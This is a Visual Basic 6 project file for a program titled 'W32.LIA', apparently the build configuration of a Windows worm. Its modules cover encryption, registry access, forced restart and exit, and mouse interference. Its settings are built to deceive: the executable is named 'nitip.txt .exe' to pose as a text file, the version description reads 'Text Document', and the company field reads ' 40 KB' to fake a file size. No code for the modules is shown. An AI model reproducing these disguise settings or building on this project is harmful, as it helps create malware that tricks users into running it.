Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\WINDOWS\system32\stdole2.tlb#OLE Automation
Reference=*\G{50A7E9B0-70EF-11D1-B75A-00A0C90564FE}#1.0#0#C:\WINDOWS\system32\SHELL32.dll#Microsoft Shell Controls And Automation
Form=lia.frm
Module=mdlCrypt; mdlCrypt.bas
Module=mdlRegistryAPI; mdlRegistryAPI.bas
Module=mdlWinCheck; mdlWinCheck.bas
Module=mdlRestart; mdlRestart.bas
Module=mdlDir; mdlDir.bas
Module=mdlWildMouse; mdlWildMouse.bas
Module=mdlWinExit; mdlWinExit.bas
ResFile32="w32lia.RES"
IconForm="lia"
Startup="lia"
HelpFile=""
Title="W32.LIA"
ExeName32="nitip.txt .exe"
Command32=""
Name="w32lia"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionComments="Creates and edits text files using basic text formatting."
VersionCompanyName=" 40 KB"
VersionFileDescription="Text Document"
CompilationType=-1
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
